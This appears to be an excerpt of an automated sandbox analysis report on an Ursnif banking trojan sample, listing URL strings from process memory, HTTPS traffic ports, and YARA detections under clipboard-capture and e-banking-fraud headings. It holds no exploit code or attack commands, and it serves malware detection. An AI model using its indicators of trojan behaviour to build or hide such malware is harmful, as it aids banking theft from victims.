            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 0000001E.00000000.433254432.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000016.00000003.389591293.0000020EA8997000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: explorer.exe, 0000001E.00000003.469432244.000000000E9E5000.00000004.00000040.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xNzD?ver=aee5&quot;
            Source: explorer.exe, 0000001E.00000003.469432244.000000000E9E5000.00000004.00000040.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xvsU?ver=77c4&quot;
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1blRDQ?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bmc4S?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=j
            Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: explorer.exe, 0000001E.00000003.477391818.000000000E9DF000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB10MkbM.img?h=16&w=16
            Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aWtIw.img?h=16&w=16
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ardZ3.img?h=16&w=16
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
            Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&
            Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
            Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6968, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A81644 memcpy,memset,GetModuleHandleA,GetProcAddress,GetClipboardData,CloseHandle,FindCloseChangeNotification,CloseHandle,GetLastError,HeapFree,
            Source: loaddll32.exe, 00000000.00000002.511370444.0000000000C2B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
